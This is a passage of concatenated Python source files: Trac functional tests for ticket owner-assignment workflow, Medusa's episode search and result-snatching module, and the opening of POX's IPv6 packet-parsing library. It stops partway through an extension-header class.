assign-to field will only contain that list of owners. The requesting user will not be added to the list. But the current ticket owner will be added to the list, and will be the default choice. """ try: ticket_id = self._tester.create_ticket(self.__class__.__name__, info={'owner': 'lammy'}) self.env.config.set('ticket-workflow', 'reassign.set_owner', "alice,bill") self.env.config.save() self._tester.go_to_ticket(ticket_id) tc.find('The owner will be changed from ' '<span class="trac-author">lammy</span>') tc.notfind('<input type="text" name="action_reassign_reassign_owner" ' 'value="admin" id="action_reassign_reassign_owner" />') tc.find('<option selected="selected" value="lammy">lammy</option>') tc.find('<option value="alice">alice</option>') tc.find('<option value="bill">bill</option>') tc.notfind('<input type="text" name="action_reassign_reassign_owner" ' 'value="admin" id="action_reassign_reassign_owner" />') tc.notfind('<option selected="selected" value="admin">admin</option>') tc.notfind('<option value="admin">admin</option>') finally: self.env.config.remove('ticket-workflow', 'reassign.set_owner') def test_set_owner_one_choice(self): """When using the workflow operation `may_set_owner` with a specific single-element list of available owners, the assign-to field will become a dropdown with two options if the current owner is not the single specified option. It will be a text field, and will not give the end user any choices at all, if and only if the current owner is the single specified option. 
""" try: ticket_id = self._tester.create_ticket(self.__class__.__name__, info={'owner': 'lammy'}) self.env.config.set('ticket-workflow', 'reassign.set_owner', "alice") self.env.config.save() self._tester.go_to_ticket(ticket_id) tc.find('The owner will be changed from ' '<span class="trac-author">lammy</span>') tc.find('<select name="action_reassign_reassign_owner"') tc.notfind('<input type="hidden" ' 'name="action_reassign_reassign_owner" ' 'value="alice" id="action_reassign_reassign_owner" />') tc.notfind('The owner will be changed from ' '<span class="trac-author">lammy<span> to ' '<span class="trac-author">alice</span>') tc.find('<option selected="selected" value="lammy">lammy</option>') tc.find('<option value="alice">alice</option>') self.env.config.set('ticket-workflow', 'reassign.set_owner', "lammy") self.env.config.save() self._tester.go_to_ticket(ticket_id) tc.notfind('<select name="action_reassign_reassign_owner"') tc.find('<input type="hidden" ' 'name="action_reassign_reassign_owner" ' 'value="lammy" id="action_reassign_reassign_owner" />') tc.find('The owner will remain ' '<span class="trac-author">lammy</span>') tc.notfind('<option selected="selected" value="lammy">lammy</option>') finally: self.env.config.remove('ticket-workflow', 'reassign.set_owner') class MaySetOwnerOperationDefaultRestrictOwnerNone(FunctionalTwillTestCaseSetup): def runTest(self): """When using the workflow operation `may_set_owner` with restrict_owner=true, the assign-to field will default to an empty option labeled (none) if the ticket currently has no owner. """ env = self._testenv.get_trac_environment() reassign_operations = env.config.get('ticket-workflow', 'reassign.operations') env.config.set('ticket-workflow', 'reassign.operations', 'may_set_owner') env.config.save() try: ticket_id = self._tester.create_ticket(self.__class__.__name__, info={'owner': ''}) restrict_owner = env.config.get('ticket', 'restrict_owner') env.config.set('ticket', 'restrict_owner', True) env.config.save() self._tester.go_to_ticket(ticket_id) tc.find("The ticket will remain with no owner.") tc.find('The owner will be changed from ' '<span class="trac-author-none">\(none\)</span>') tc.find('<option selected="selected" value="">\(none\)</option>') finally: env.config.set('ticket-workflow', 'reassign.operations', reassign_operations) env.config.set('ticket', 'restrict_owner', restrict_owner) env.config.save() class MaySetOwnerOperationDefaultRestrictOwnerAnonymous(FunctionalTwillTestCaseSetup): def runTest(self): """When using the workflow operation `may_set_owner` with restrict_owner=true, the assign-to dropdown menu will contain a selected option "anonymous" if the ticket is owned by "anonymous". 
""" env = self._testenv.get_trac_environment() reassign_operations = env.config.get('ticket-workflow', 'reassign.operations') env.config.set('ticket-workflow', 'reassign.operations', 'may_set_owner') restrict_owner = env.config.get('ticket', 'restrict_owner') env.config.set('ticket', 'restrict_owner', False) env.config.save() try: ticket_id = \ self._tester.create_ticket(self.__class__.__name__, info={'owner': 'anonymous'}) env.config.set('ticket', 'restrict_owner', True) env.config.save() self._tester.logout() self._testenv.grant_perm('anonymous', 'TICKET_ADMIN') self._tester.go_to_ticket(ticket_id) tc.find('The owner will be changed from ' '<span class="trac-author-anonymous">anonymous</span>') tc.find('<option selected="selected" value="anonymous">' 'anonymous</option>') finally: self._testenv.revoke_perm('anonymous', 'TICKET_ADMIN') self._tester.login('admin') env.config.set('ticket-workflow', 'reassign.operations', reassign_operations) env.config.set('ticket', 'restrict_owner', restrict_owner) env.config.save() class RegressionTestTicket11930(FunctionalTwillTestCaseSetup): def runTest(self): """Test for regression of http://trac.edgewall.org/ticket/11930 Workflow action labels are present on the ticket page. """ self._tester.create_ticket() tc.find('<label for="action_leave">leave</label>[ \n\t]+as new') tc.find('<label for="action_resolve">resolve</label>[ \n\t]+as') tc.find('<label for="action_reassign">reassign</label>[ \n\t]+to') tc.find('<label for="action_accept">accept</label>') def functionalSuite(suite=None): if not suite: import trac.tests.functional suite = trac.tests.functional.functionalSuite() suite.addTests(unittest.makeSuite(SetOwnerOperation)) suite.addTests(unittest.makeSuite(MaySetOwnerOperationRestrictOwnerFalse)) suite.addTest(MaySetOwnerOperationDefaultRestrictOwnerNone()) suite.addTest(MaySetOwnerOperationDefaultRestrictOwnerAnonymous()) suite.addTest(RegressionTestTicket11930()) return suite suite = functionalSuite if __name__ == '__main__': unittest.main(defaultTest='suite')
# coding=utf-8 """Search core module.""" from __future__ import division from __future__ import unicode_literals import datetime import itertools import logging import operator import os import threading import time from medusa import ( app, common, db, failed_history, history, name_cache, notifiers, ui, ) from medusa.clients import torrent from medusa.clients.nzb import ( nzbget, sab, ) from medusa.common import ( MULTI_EP_RESULT, Quality, SEASON_RESULT, SNATCHED, SNATCHED_BEST, SNATCHED_PROPER, UNSET, ) from medusa.helper.common import ( enabled_providers, episode_num, ) from medusa.helper.exceptions import ( AuthException, ex, ) from medusa.helpers import chmod_as_parent from medusa.helpers.utils import to_timestamp from medusa.logger.adapters.style import CustomBraceAdapter from medusa.network_timezones import app_timezone from medusa.show import naming from six import iteritems, itervalues log = CustomBraceAdapter(logging.getLogger(__name__)) log.logger.addHandler(logging.NullHandler()) def _download_result(result): """ Download a result to the appropriate black hole folder. :param result: SearchResult instance to download. :return: boolean, True on success """ res_provider = result.provider if res_provider is None: log.error(u'Invalid provider name - this is a coding error, report it please') return False # nzbs with an URL can just be downloaded from the provider if result.result_type == u'nzb': new_result = res_provider.download_result(result) # if it's an nzb data result elif result.result_type == u'nzbdata': # get the final file path to the nzb file_name = os.path.join(app.NZB_DIR, result.name + u'.nzb') log.info(u'Saving NZB to {0}', file_name) new_result = True # save the data to disk try: with open(file_name, u'wb') as file_out: file_out.write(result.extra_info[0]) chmod_as_parent(file_name) except EnvironmentError as e: log.error(u'Error trying to save NZB to black hole: {0}', ex(e)) new_result = False elif result.result_type == u'torrent': new_result = res_provider.download_result(result) else: log.error(u'Invalid provider type - this is a coding error, report it please') new_result = False return new_result def snatch_result(result): """ Snatch a result that has been found. :param result: SearchResult instance to be snatched. :return: boolean, True on success """ if result is None: return False result.priority = 0 # -1 = low, 0 = normal, 1 = high is_proper = False if app.ALLOW_HIGH_PRIORITY: # if it aired recently make it high priority for cur_ep in result.episodes: if datetime.date.today() - cur_ep.airdate <= datetime.timedelta(days=7): result.priority = 1 if result.proper_tags: log.debug(u'Found proper tags for {0}. Snatching as PROPER', result.name) is_proper = True end_status = SNATCHED_PROPER else: end_status = SNATCHED # Binsearch.info requires you to download the nzb through a post. 
if result.provider.kind() == 'BinSearchProvider': result.result_type = 'nzbdata' nzb_data = result.provider.download_nzb_for_post(result) result.extra_info.append(nzb_data) if not nzb_data: log.warning('Error trying to get the nzb data from provider binsearch, no data returned') return False # NZBs can be sent straight to SAB or saved to disk if result.result_type in (u'nzb', u'nzbdata'): if app.NZB_METHOD == u'blackhole': result_downloaded = _download_result(result) elif app.NZB_METHOD == u'sabnzbd': result_downloaded = sab.send_nzb(result) elif app.NZB_METHOD == u'nzbget': result_downloaded = nzbget.send_nzb(result, is_proper) else: log.error(u'Unknown NZB action specified in config: {0}', app.NZB_METHOD) result_downloaded = False # Torrents can be sent to clients or saved to disk elif result.result_type == u'torrent': # torrents are saved to disk when blackhole mode # Handle SAVE_MAGNET_FILE if app.TORRENT_METHOD == u'blackhole': result_downloaded = _download_result(result) else: if not result.content and not result.url.startswith(u'magnet:'): if result.provider.login(): if result.provider.kind() == 'TorznabProvider': result.url = result.provider.get_redirect_url(result.url) if not result.url.startswith(u'magnet:'): result.content = result.provider.get_content(result.url) if result.content or result.url.startswith(u'magnet:'): client = torrent.get_client_class(app.TORRENT_METHOD)() result_downloaded = client.send_torrent(result) else: log.warning(u'Torrent file content is empty: {0}', result.name) result_downloaded = False else: log.error(u'Unknown result type, unable to download it: {0!r}', result.result_type) result_downloaded = False if not result_downloaded: return False # Assign the nzb_id depending on the method. # We already have the info_hash (for torrents) in the SearchResult Object. if result.result_type in (u'nzb', u'nzbdata') and app.NZB_METHOD != 'blackhole': # We get this back from sabnzbd or nzbget result.nzb_id = result_downloaded if app.USE_FAILED_DOWNLOADS: failed_history.log_snatch(result) ui.notifications.message(u'Episode snatched', result.name) history.log_snatch(result) # don't notify when we re-download an episode sql_l = [] trakt_data = [] for cur_ep_obj in result.episodes: with cur_ep_obj.lock: if is_first_best_match(result): cur_ep_obj.status = SNATCHED_BEST cur_ep_obj.quality = result.quality else: cur_ep_obj.status = end_status cur_ep_obj.quality = result.quality # Reset all others fields to the snatched status # New snatch by default doesn't have nfo/tbn cur_ep_obj.hasnfo = False cur_ep_obj.hastbn = False # We can't reset location because we need to know what we are replacing # cur_ep_obj.location = '' # Release name and group are parsed in PP cur_ep_obj.release_name = '' cur_ep_obj.release_group = '' # Need to reset subtitle settings because it's a different file cur_ep_obj.subtitles = list() cur_ep_obj.subtitles_searchcount = 0 cur_ep_obj.subtitles_lastsearch = u'0001-01-01 00:00:00' # Need to store the correct is_proper. 
Not use the old one cur_ep_obj.is_proper = is_proper cur_ep_obj.version = 0 cur_ep_obj.manually_searched = result.manually_searched sql_l.append(cur_ep_obj.get_sql()) if cur_ep_obj.status != common.DOWNLOADED: notifiers.notify_snatch(cur_ep_obj, result) if app.USE_TRAKT and app.TRAKT_SYNC_WATCHLIST: trakt_data.append(cur_ep_obj) log.info( u'Adding {0} {1} to Trakt watchlist', result.series.name, episode_num(cur_ep_obj.season, cur_ep_obj.episode), ) if trakt_data: for episode in trakt_data: notifiers.trakt_notifier.add_episode_to_watchlist(episode) if sql_l: main_db_con = db.DBConnection() main_db_con.mass_action(sql_l) return True def filter_results(results): """ Filter wanted results out of a list of search results for a show. :param results: list of result objects :return: list of wanted result objects """ results = results if isinstance(results, list) else [results] wanted_results = [] # find the best result for the current episode for cur_result in results: assert cur_result.series, 'Every SearchResult object should have a series object available at this point.' # Skip the result if search delay is enabled for the provider if delay_search(cur_result): continue # Every SearchResult object should have a show attribute available at this point. series_obj = cur_result.series # build the black and white list if series_obj.is_anime and series_obj.release_groups: if not series_obj.release_groups.is_valid(cur_result): continue log.info('Quality of {0} is {1}', cur_result.name, Quality.qualityStrings[cur_result.quality]) allowed_qualities, preferred_qualities = series_obj.current_qualities if cur_result.quality not in allowed_qualities + preferred_qualities: log.debug('{0} is an unwanted quality, rejecting it', cur_result.name) continue wanted_episodes = series_obj.want_episodes( cur_result.actual_season, cur_result.actual_episodes, cur_result.quality, download_current_quality=cur_result.download_current_quality, search_type=cur_result.search_type) if not wanted_episodes: continue # If doesnt have min seeders OR min leechers then discard it if cur_result.seeders not in (-1, None) and cur_result.leechers not in (-1, None) \ and hasattr(cur_result.provider, u'minseed') and hasattr(cur_result.provider, u'minleech') \ and (int(cur_result.seeders) < int(cur_result.provider.minseed) or int(cur_result.leechers) < int(cur_result.provider.minleech)): log.info( u'Discarding torrent because it does not meet the minimum provider setting ' u'S:{0} L:{1}. 
Result has S:{2} L:{3}', cur_result.provider.minseed, cur_result.provider.minleech, cur_result.seeders, cur_result.leechers, ) continue ignored_words = series_obj.show_words().ignored_words required_words = series_obj.show_words().required_words found_ignored_word = naming.contains_at_least_one_word(cur_result.name, ignored_words) found_required_word = naming.contains_at_least_one_word(cur_result.name, required_words) if ignored_words and found_ignored_word: log.info(u'Ignoring {0} based on ignored words filter: {1}', cur_result.name, found_ignored_word) continue if required_words and not found_required_word: log.info(u'Ignoring {0} based on required words filter: {1}', cur_result.name, required_words) continue if not naming.filter_bad_releases(cur_result.name, parse=False): continue if hasattr(cur_result, u'size'): if app.USE_FAILED_DOWNLOADS and failed_history.has_failed(cur_result.name, cur_result.size, cur_result.provider.name): log.info(u'{0} has previously failed, rejecting it', cur_result.name) continue wanted_results.append(cur_result) if wanted_results: log.debug(u'Found wanted results.') else: log.debug(u'No wanted results found.') return wanted_results def sort_results(results): """Sort results based on show specific preferences.""" wanted_results = [] if not results: log.debug(u'No results to sort.') return wanted_results sorted_results = sorted(results, key=operator.attrgetter('quality'), reverse=True) log.debug(u'Sorting the following results: {0}', [x.name for x in sorted_results]) preferred_words = [] if app.PREFERRED_WORDS: preferred_words = [word.lower() for word in app.PREFERRED_WORDS] undesired_words = [] if app.UNDESIRED_WORDS: undesired_words = [word.lower() for word in app.UNDESIRED_WORDS] def percentage(percent, whole): return (percent * whole) / 100.0 initial_score = 100.0 for result in sorted_results: score = initial_score if wanted_results: allowed_qualities, preferred_qualities = result.series.current_qualities if Quality.is_higher_quality(wanted_results[0][0].quality, result.quality, allowed_qualities, preferred_qualities): log.debug(u'Rewarding release {0} (higher quality)', result.name) score += percentage(10, score) initial_score = score if result.proper_tags and (not wanted_results or wanted_results[0][0].quality == result.quality): log.debug(u'Rewarding release {0} (repack/proper/real/rerip)', result.name) # Stop at max. 
4 proper tags for _tag in result.proper_tags[:4]: score += percentage(2, score) if any(word in result.name.lower() for word in undesired_words): log.debug(u'Penalizing release {0} (contains undesired word(s))', result.name) score -= percentage(20, score) if any(word in result.name.lower() for word in preferred_words): log.debug(u'Rewarding release {0} (contains preferred word(s))', result.name) score += percentage(20, score) wanted_results.append((result, score)) wanted_results.sort(key=operator.itemgetter(1), reverse=True) header = '{0:<6} {1}'.format('Score', 'Release') log.debug( u'Computed result scores:' u'\n{header}' u'\n{results}', { 'header': header, 'results': '\n'.join( '{score:<6.2f} {name}'.format(score=item[1], name=item[0].name) for item in wanted_results ) } ) return [result[0] for result in wanted_results] def pick_result(wanted_results): """Pick the first result out of a list of wanted candidates.""" candidates = sort_results(wanted_results) if not candidates: log.debug(u'No results to pick from.') return None best_result = candidates[0] log.info(u'Picked {0} as the best result.', best_result.name) return best_result def is_first_best_match(result): """ Check if the given result is a best quality match and if we want to stop searching providers here. :param result: to check :return: True if the result is the best quality match else False """ log.debug(u'Checking if we should stop searching for a better quality for for episode {0}', result.name) series_obj = result.episodes[0].series _, preferred_qualities = series_obj.current_qualities # Don't pass allowed because we only want to check if this quality is wanted preferred. return Quality.wanted_quality(result.quality, [], preferred_qualities) def wanted_episodes(series_obj, from_date): """ Get a list of episodes that we want to download. :param series_obj: Series these episodes are from :param from_date: Search from a certain date :return: list of wanted episodes """ wanted = [] allowed_qualities, preferred_qualities = series_obj.current_qualities all_qualities = list(set(allowed_qualities + preferred_qualities)) log.debug(u'Seeing if we need anything from {0}', series_obj.name) con = db.DBConnection() sql_results = con.select( 'SELECT status, quality, season, episode, manually_searched ' 'FROM tv_episodes ' 'WHERE indexer = ? ' ' AND showid = ?' ' AND season > 0' ' AND airdate > ?', [series_obj.indexer, series_obj.series_id, from_date.toordinal()] ) # check through the list of statuses to see if we want any for episode in sql_results: cur_status, cur_quality = int(episode['status'] or UNSET), int(episode['quality'] or Quality.NA) should_search, should_search_reason = Quality.should_search( cur_status, cur_quality, series_obj, episode['manually_searched'] ) if not should_search: continue else: log.debug( u'Searching for {show} {ep}. Reason: {reason}', { u'show': series_obj.name, u'ep': episode_num(episode['season'], episode['episode']), u'reason': should_search_reason, } ) ep_obj = series_obj.get_episode(episode['season'], episode['episode']) ep_obj.wanted_quality = [ quality for quality in all_qualities if Quality.is_higher_quality( cur_quality, quality, allowed_qualities, preferred_qualities ) ] wanted.append(ep_obj) return wanted def search_for_needed_episodes(scheduler_start_time, force=False): """Search providers for needed episodes. 
:param force: run the search even if no episodes are needed :param scheduler_start_time: timestamp of the start of the search scheduler :return: list of found episodes """ show_list = app.showList from_date = datetime.date.fromordinal(1) episodes = [] for cur_show in show_list: if cur_show.paused: log.debug( u'Not checking for needed episodes of {0} because the show is paused', cur_show.name, ) continue episodes.extend(wanted_episodes(cur_show, from_date)) if not episodes and not force: # nothing wanted so early out, ie: avoid whatever arbitrarily # complex thing a provider cache update entails, for example, # reading rss feeds return [] providers = enabled_providers(u'daily') if not providers: log.warning( u'No NZB/Torrent providers found or enabled in the application config for daily searches.' u' Please check your settings' ) return [] original_thread_name = threading.currentThread().name log.info(u'Using daily search providers') for cur_provider in providers: threading.currentThread().name = u'{thread} :: [{provider}]'.format( thread=original_thread_name, provider=cur_provider.name ) cur_provider.cache.update_cache(scheduler_start_time) single_results = {} multi_results = [] for cur_provider in providers: threading.currentThread().name = u'{thread} :: [{provider}]'.format( thread=original_thread_name, provider=cur_provider.name ) try: found_results = cur_provider.cache.find_needed_episodes(episodes) except AuthException as error: log.error(u'Authentication error: {0}', ex(error)) continue # pick a single result for each episode, respecting existing results for episode_no, results in iteritems(found_results): if results[0].series.paused: log.debug(u'Skipping {0} because the show is paused.', results[0].series.name) continue # if all results were rejected move on to the next episode wanted_results = filter_results(results) if not wanted_results: log.debug(u'All found results for {0} were rejected.', results[0].series.name) continue best_result = pick_result(wanted_results) if episode_no in (SEASON_RESULT, MULTI_EP_RESULT): multi_results.append(best_result) else: # if it's already in the list (from another provider) and # the newly found quality is no better then skip it if episode_no in single_results: allowed_qualities, preferred_qualities = results[0].series.current_qualities if not Quality.is_higher_quality(single_results[episode_no].quality, best_result.quality, allowed_qualities, preferred_qualities): continue single_results[episode_no] = best_result threading.currentThread().name = original_thread_name return combine_results(multi_results, list(itervalues(single_results))) def delay_search(best_result): """Delay the search by ignoring the best result, when search delay is enabled for this provider. If the providers attribute enable_search_delay is enabled for this provider and it's younger then then it's search_delay time (minutes) skip it. For this we need to check if the result has already been stored in the provider cache db, and if it's still younger then the providers attribute search_delay. :param best_result: SearchResult object. :return: True if we want to skipp this result. 
""" cur_provider = best_result.provider if cur_provider.enable_search_delay and cur_provider.search_delay: # In minutes cur_ep = best_result.episodes[0] log.debug('DELAY: Provider {provider} delay enabled, with an expiration of {delay} hours', {'provider': cur_provider.name, 'delay': round(cur_provider.search_delay / 60, 1)}) from medusa.search.manual import get_provider_cache_results results = get_provider_cache_results( cur_ep.series, show_all_results=False, perform_search=False, season=cur_ep.season, episode=cur_ep.episode, manual_search_type='episode' ) if results.get('found_items'): # If date_added is missing we put it at the end of the list results['found_items'].sort(key=lambda d: d['date_added'] or datetime.datetime.now(app_timezone)) first_result = results['found_items'][0] date_added = first_result['date_added'] # Some results in cache have date_added as 0 if not date_added: log.debug("DELAY: First result in cache doesn't have a valid date, skipping provider.") return False timestamp = to_timestamp(date_added) if timestamp + cur_provider.search_delay * 60 > time.time(): # The provider's delay cooldown time hasn't expired yet. We're holding back the snatch. log.debug( 'DELAY: Holding back best result {best_result} over {first_result} for provider {provider}.' ' The provider is waiting {search_delay_minutes} hours, before accepting the release.' ' Still {hours_left} to go.', { 'best_result': best_result.name, 'first_result': first_result['name'], 'provider': cur_provider.name, 'search_delay_minutes': round(cur_provider.search_delay / 60, 1), 'hours_left': round((cur_provider.search_delay - (time.time() - timestamp) / 60) / 60, 1) } ) return True else: log.debug('DELAY: Provider {provider}, found a result in cache, and the delay has expired. ' 'Time of first result: {first_result}', {'provider': cur_provider.name, 'first_result': date_added}) else: # This should never happen. log.debug( 'DELAY: Provider {provider}, searched cache but could not get any results for: {series} {season_ep}', {'provider': cur_provider.name, 'series': best_result.series.name, 'season_ep': episode_num(cur_ep.season, cur_ep.episode)}) return False def search_providers(series_obj, episodes, forced_search=False, down_cur_quality=False, manual_search=False, manual_search_type=u'episode'): """ Walk providers for information on shows. :param series_obj: Show we are looking for :param episodes: List, episodes we hope to find :param forced_search: Boolean, is this a forced search? :param down_cur_quality: Boolean, should we re-download currently available quality file :param manual_search: Boolean, should we choose what to download? :param manual_search_type: Episode or Season search :return: results for search """ found_results = {} manual_search_results = [] multi_results = [] single_results = [] # build name cache for show name_cache.build_name_cache(series_obj) original_thread_name = threading.currentThread().name if manual_search: log.info(u'Using manual search providers') providers = enabled_providers(u'manualsearch') else: log.info(u'Using backlog search providers') providers = enabled_providers(u'backlog') if not providers: log.warning(u'No NZB/Torrent providers found or enabled in the application config for {0} searches.' 
u' Please check your settings', 'manual' if manual_search else 'backlog') threading.currentThread().name = original_thread_name for cur_provider in providers: threading.currentThread().name = '{original_thread_name} :: [{provider}]'.format( original_thread_name=original_thread_name, provider=cur_provider.name ) if cur_provider.anime_only and not series_obj.is_anime: log.debug(u'{0} is not an anime, skipping', series_obj.name) continue found_results[cur_provider.name] = {} search_count = 0 search_mode = cur_provider.search_mode # Always search for episode when manually searching when in sponly if search_mode == u'sponly' and (forced_search or manual_search): search_mode = u'eponly' if manual_search and manual_search_type == u'season': search_mode = u'sponly' while True: search_count += 1 if search_mode == u'eponly': log.info(u'Performing episode search for {0}', series_obj.name) else: log.info(u'Performing season pack search for {0}', series_obj.name) try: search_results = [] needed_eps = episodes if not manual_search: cache_search_results = cur_provider.search_results_in_cache(episodes) if cache_search_results: cache_found_results = list_results_for_provider(cache_search_results, found_results, cur_provider) multi_results, single_results = collect_candidates( cache_found_results, cur_provider, multi_results, single_results ) found_eps = itertools.chain(*(result.episodes for result in multi_results + single_results)) needed_eps = [ep for ep in episodes if ep not in found_eps] # We only search if we didn't get any useful results from cache if needed_eps: log.debug(u'Could not find all candidates in cache, searching provider.') search_results = cur_provider.find_search_results(series_obj, needed_eps, search_mode, forced_search, down_cur_quality, manual_search, manual_search_type) # Update the list found_results found_results = list_results_for_provider(search_results, found_results, cur_provider) multi_results, single_results = collect_candidates( found_results, cur_provider, multi_results, single_results ) found_eps = itertools.chain(*(result.episodes for result in multi_results + single_results)) needed_eps = [ep for ep in episodes if ep not in found_eps] except AuthException as error: log.error(u'Authentication error: {0!r}', error) break if not needed_eps and found_results: break elif not cur_provider.search_fallback or search_count == 2: break # Don't fallback when doing manual season search if manual_search_type == u'season': break if search_mode == u'sponly': log.debug(u'Fallback episode search initiated') search_mode = u'eponly' else: log.debug(u'Fallback season pack search initiated') search_mode = u'sponly' # skip to next provider if we have no results to process if not found_results[cur_provider.name]: continue # Update the cache if a manual search is being run if manual_search: # Let's create a list with episodes that we where looking for if manual_search_type == u'season': # If season search type, we only want season packs searched_episode_list = [SEASON_RESULT] else: searched_episode_list = [episode_obj.episode for episode_obj in episodes] + [MULTI_EP_RESULT] for searched_episode in searched_episode_list: if (searched_episode in search_results and cur_provider.cache.update_cache_manual_search(search_results[searched_episode])): # If we have at least a result from one provider, it's good enough to be marked as result manual_search_results.append(True) # Continue because we don't want to pick best results as we are running a manual search by user continue # Remove provider from 
thread name before return results threading.currentThread().name = original_thread_name if manual_search: # If results in manual search return True, else False return any(manual_search_results) else: return combine_results(multi_results, single_results) def collect_candidates(found_results, provider, multi_results, single_results): """Collect candidates for episode, multi-episode or season results.""" # Collect candidates for multi-episode or season results multi_results = collect_multi_candidates(found_results[provider.name], multi_results) # Collect candidates for single-episode results single_results = collect_single_candidates(found_results[provider.name], single_results) return multi_results, single_results def list_results_for_provider(search_results, found_results, provider): """ Add results for this provider to the search_results dict. The structure is based on [provider_name][episode_number][search_result] :param search_results: New dictionary with search results for this provider :param found_results: Dictionary with existing per provider search results :param provider: Provider object :return: Updated dict found_results """ for cur_ep in search_results: if cur_ep in found_results[provider.name]: found_results[provider.name][cur_ep] += search_results[cur_ep] else: found_results[provider.name][cur_ep] = search_results[cur_ep] # Sort the list by seeders if possible if provider.provider_type == u'torrent' or getattr(provider, u'torznab', None): found_results[provider.name][cur_ep].sort(key=lambda d: int(d.seeders), reverse=True) return found_results def collect_multi_candidates(candidates, results): """Collect mutli-episode and season result candidates.""" multi_results = list(results) new_candidates = [] multi_candidates = (candidate for result, candidate in iteritems(candidates) if result in (SEASON_RESULT, MULTI_EP_RESULT)) multi_candidates = list(itertools.chain(*multi_candidates)) if multi_candidates: new_candidates = filter_results(multi_candidates) return multi_results + new_candidates def collect_single_candidates(candidates, results): """ Collect single-episode result candidates. :param candidates: A list of SearchResult objects we just parsed, which we want to evaluate against the already collected list of results. :param results: The existing list of valid results. 
""" single_results = list(results) new_candidates = [] # of all the single-ep results narrow it down to the best one for each episode for episode in candidates: if episode in (MULTI_EP_RESULT, SEASON_RESULT): continue # if all results were rejected move on to the next episode wanted_results = filter_results(candidates[episode]) if not wanted_results: continue result_candidates = [] for i, candidate in enumerate(single_results): if episode in candidate.actual_episodes: result_candidates.append(candidate) del single_results[i] best_result = pick_result(result_candidates + wanted_results) new_candidates.append(best_result) return single_results + new_candidates def combine_results(multi_results, single_results): """Combine single and multi-episode results, filtering out overlapping results.""" log.debug(u'Combining single and multi-episode results') result_candidates = [] multi_results = sort_results(multi_results) for candidate in multi_results: if result_candidates: # check if these eps are already covered by another multi-result multi_needed_eps = [] multi_not_needed_eps = [] for ep_obj in candidate.episodes: for result in result_candidates: if ep_obj in result.episodes: multi_not_needed_eps.append(ep_obj.episode) else: multi_needed_eps.append(ep_obj.episode) log.debug(u'Multi-ep check result is multi_needed_eps: {0}, multi_not_needed_eps: {1}', multi_needed_eps, multi_not_needed_eps) if not multi_needed_eps: log.debug( u'All of these episodes were covered by another multi-episode result,' u' ignoring this multi-episode result' ) continue log.debug(u'Adding {0} to multi-episode result candidates', candidate.name) result_candidates.append(candidate) # If there aren't any single results we can return early if not single_results: return result_candidates for multi_result in result_candidates: # remove the single result if we're going to get it with a multi-result for ep_obj in multi_result.episodes: for i, result in enumerate(single_results): if ep_obj in result.episodes: log.debug( u'A needed multi-episode result overlaps with a single-episode result' u' for episode {0}, removing the single-episode results from the list', ep_obj.episode, ) del single_results[i] return single_results + result_candidates
# Copyright 2012,2013 James McCauley # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at: # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. #====================================================================== # # IPv6 Header Format # # 0 1 2 3 # 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 # +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ # |Version| Traffic Class | Flow Label | # +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ # | Payload Length | Next Header | Hop Limit | # +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ # | | # | Source Address | # | | # | | # +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ # | | # | Destination Address | # | | # | | # +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ # #====================================================================== """ IPv6 packet classes This is still rough. There are a number of things remaining to do (additional extension header types, payload inference), and there are probably places where the API isn't quite right yet. But it's a start. """ import struct from packet_utils import * from tcp import * from udp import * from icmpv6 import * from packet_base import packet_base from pox.lib.addresses import IPAddr6 from pox.lib.util import init_helper _extension_headers = {} def extension_header_def (header_type): """ Extension Header decorator """ #TODO: Switch to using generic class registry def f (cls): _extension_headers[header_type] = cls cls.TYPE = header_type return cls return f class ExtensionHeader (object): next_header_type = None class NormalExtensionHeader (ExtensionHeader): """ A superclass for many ExtensionHeaders Many Extension Headers follow the same basic format, which is also suggested for future Extension Headers in RFC 6564. """ #TYPE = <type number> def __init__ (self, *args, **kw): self.payload_length = 0 self._init(*args, **kw) init_helper(self, kw) def __len__ (self): """ Returns the packed length """ l = self.payload_length + 2 return ((l + 7) / 8) - 1 @classmethod def unpack_new (cls, raw, offset = 0, max_length = None): """ Unpacks a new instance of this class from a buffer returns (new_offset, object) """ if max_length and max_length < 2: raise TruncatedException() nh,l = struct.unpack_from("!BB", raw, offset) max_length -= 2 l = l * 8 + 6 if max_length is not None and max_length < l: raise TruncatedException() offset += 2 d = cls._unpack_body(raw, offset, nh, l) offset += l d['payload_length'] = l d['next_header_type'] = nh return offset, cls(**d) def pack (self): o = struct.pack("!BB", self.next_header_type, len(self)) return o + self._pack_body() def _init (self, *args, **kw): """ Called during initialization Override me """ pass def _pack_body (self): """ Returns the body of this Extension Header packed into bytes Override me """ return b'' @classmethod def _unpack_body (cls, raw, offset, next_header_type, length): """ Unpacks the body portion of an Extension Header Override me. 
